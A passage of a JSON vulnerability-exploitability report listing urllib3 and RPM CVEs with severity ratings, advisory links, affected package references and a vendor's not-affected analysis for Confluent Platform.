            "name": "nvd"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        200
      ],
      "description": "urllib3 is an HTTP client library for Python. From 1.23 to before 2.7.0, cross-origin redirects followed from the low-level API via ProxyManager.connection_from_url().urlopen(..., assert_same_host=False) still forward these sensitive headers. This vulnerability is fixed in 2.7.0.",
      "recommendation": "Upgrade urllib3 to version 2.7.0",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-44431"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:28000"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:28158"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-44431"
        },
        {
          "url": "https://bugzilla.redhat.com/2477154"
        },
        {
          "url": "https://bugzilla.redhat.com/2477167"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2477154"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2477167"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-44431"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-44432"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2026-28000.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:28158"
        },
        {
          "url": "https://github.com/urllib3/urllib3"
        },
        {
          "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-qccp-gfcp-xxvc"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-44431.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-49927.html"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2026/06/msg00040.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44431"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8379-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-44431"
        }
      ],
      "published": "2026-05-13T16:16:57+00:00",
      "updated": "2026-06-26T12:16:32+00:00",
      "affects": [
        {
          "ref": "pkg:pypi/urllib3@2.6.3",
          "versions": [
            {
              "version": "2.6.3",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:pypi/urllib3@2.6.3"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:pypi/urllib3@2.6.3"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:pypi/urllib3@2.6.3"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:pypi/urllib3@2.6.3"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:pypi/urllib3@2.6.3"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:pypi/urllib3@2.6.3"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:pypi/urllib3@2.6.3"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:pypi/urllib3@2.6.3"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:pypi/urllib3@2.6.3"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:pypi/urllib3@2.6.3"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:pypi/urllib3@2.6.3"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:pypi/urllib3@2.6.3"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:pypi/urllib3@2.6.3"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:pypi/urllib3@2.6.3"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:pypi/urllib3@2.6.3"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:pypi/urllib3@2.6.3"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:pypi/urllib3@2.6.3"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:pypi/urllib3@2.6.3"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:pypi/urllib3@2.6.3"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-44432",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip"
      },
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ghsa"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        409
      ],
      "description": "urllib3 is an HTTP client library for Python. From 2.6.0 to before 2.7.0, urllib3 could decompress the whole response instead of the requested portion (1) during the second HTTPResponse.read(amt=N) call when the response was decompressed using the official Brotli library or (2) when HTTPResponse.drain_conn() was called after the response had been read and decompressed partially (compression algorithm did not matter here). These issues could cause urllib3 to fully decode a small amount of highly compressed data in a single operation. This could result in excessive resource consumption (high CPU usage and massive memory allocation for the decompressed data) on the client side. This vulnerability is fixed in 2.7.0.",
      "recommendation": "Upgrade urllib3 to version 2.7.0",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-44432"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:15862"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:20338"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:22934"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:24000"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:24009"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:24014"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:24069"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:24374"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:24476"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:24483"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:24540"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:24541"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:24542"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:24544"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:25039"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:25143"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:25928"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:26212"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:26304"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:27929"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:28000"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:28157"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:28158"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:28159"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:28571"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:30076"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:30078"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:30087"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:30088"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:30089"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:32992"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:33313"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:33683"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34160"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34374"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34526"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34531"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34533"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34607"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:36350"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:37275"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:41066"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42078"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42079"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42132"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42144"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42644"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42796"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:43038"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:44481"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:51206"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:56347"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:7625"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:7634"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-44432"
        },
        {
          "url": "https://bugzilla.redhat.com/2477154"
        },
        {
          "url": "https://bugzilla.redhat.com/2477167"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2477154"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2477167"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-44431"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-44432"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2026-28000.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:28158"
        },
        {
          "url": "https://github.com/pypa/advisory-database/tree/main/vulns/urllib3/PYSEC-2026-142.yaml"
        },
        {
          "url": "https://github.com/urllib3/urllib3"
        },
        {
          "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-mf9v-mfxr-j63j"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-44432.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-32992.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44432"
        },
        {
          "url": "https://security.access.redhat.com/data/csaf/v2/vex/2026/cve-2026-44432.json"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8379-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-44432"
        }
      ],
      "published": "2026-05-13T16:16:57+00:00",
      "updated": "2026-08-19T12:18:19+00:00",
      "affects": [
        {
          "ref": "pkg:pypi/urllib3@2.6.3",
          "versions": [
            {
              "version": "2.6.3",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:pypi/urllib3@2.6.3"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:pypi/urllib3@2.6.3"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:pypi/urllib3@2.6.3"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:pypi/urllib3@2.6.3"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:pypi/urllib3@2.6.3"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:pypi/urllib3@2.6.3"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:pypi/urllib3@2.6.3"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:pypi/urllib3@2.6.3"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:pypi/urllib3@2.6.3"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:pypi/urllib3@2.6.3"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:pypi/urllib3@2.6.3"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:pypi/urllib3@2.6.3"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:pypi/urllib3@2.6.3"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:pypi/urllib3@2.6.3"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:pypi/urllib3@2.6.3"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:pypi/urllib3@2.6.3"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:pypi/urllib3@2.6.3"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:pypi/urllib3@2.6.3"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:pypi/urllib3@2.6.3"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-44604",
      "ratings": [
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H"
        }
      ],
      "cwes": [
        78
      ],
      "description": "A command injection vulnerability was discovered in the `rpmuncompress` utility of RPM. When extracting certain archive formats (ZIP, 7z, GEM) to a specified destination directory, the tool inserts the archive's top-level folder name into a shell command without properly sanitizing it. A specially crafted archive containing shell metacharacters in its folder name can execute arbitrary commands as the user running the extraction.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-44604"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:28491"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-44604"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2460967"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44604"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-44604"
        }
      ],
      "published": "2026-05-28T08:16:35+00:00",
      "updated": "2026-06-23T20:16:47+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python3-rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "4.14.3-32.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/rpm-build-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "4.14.3-32.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/rpm-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "4.14.3-32.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "4.14.3-32.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/python3-rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/rpm-build-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/rpm-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/python3-rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/rpm-build-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/rpm-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/python3-rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/rpm-build-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/rpm-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/python3-rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/rpm-build-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/rpm-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/python3-rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/rpm-build-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/rpm-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/python3-rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/rpm-build-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/rpm-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/python3-rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/rpm-build-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/rpm-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/python3-rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/rpm-build-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/rpm-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/python3-rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/rpm-build-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/rpm-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/python3-rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/rpm-build-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/rpm-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/python3-rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/rpm-build-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/rpm-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/python3-rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/rpm-build-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/rpm-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/python3-rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/rpm-build-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/rpm-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/python3-rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/rpm-build-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/rpm-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/python3-rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/rpm-build-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/rpm-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
